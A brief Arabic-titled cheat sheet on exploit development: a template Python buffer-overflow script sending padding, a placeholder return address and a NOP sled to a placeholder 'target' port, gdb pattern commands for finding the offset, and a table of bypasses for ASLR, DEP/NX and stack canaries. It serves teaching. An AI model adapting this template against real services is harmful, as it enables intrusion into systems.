تطوير الاستغلالات

تطوير الاستغلالات

Buffer Overflow

import socket
buffer = b"A" * 2048
offset = b"B" * 4
shellcode = b"\x90" * 16
payload = buffer + offset + shellcode
s = socket.socket()
s.connect(("target", 9999))
s.send(payload)

أدوات التطوير

gdb -q ./vulnerable
pattern create 200
pattern offset $eip

تقنيات الحماية والتجاوز

| الحماية | طريقة التجاوز | |---------|---------------| | ASLR | Heap Spray, Info Leak | | DEP/NX | ROP Chains | | Stack Canary | Format String |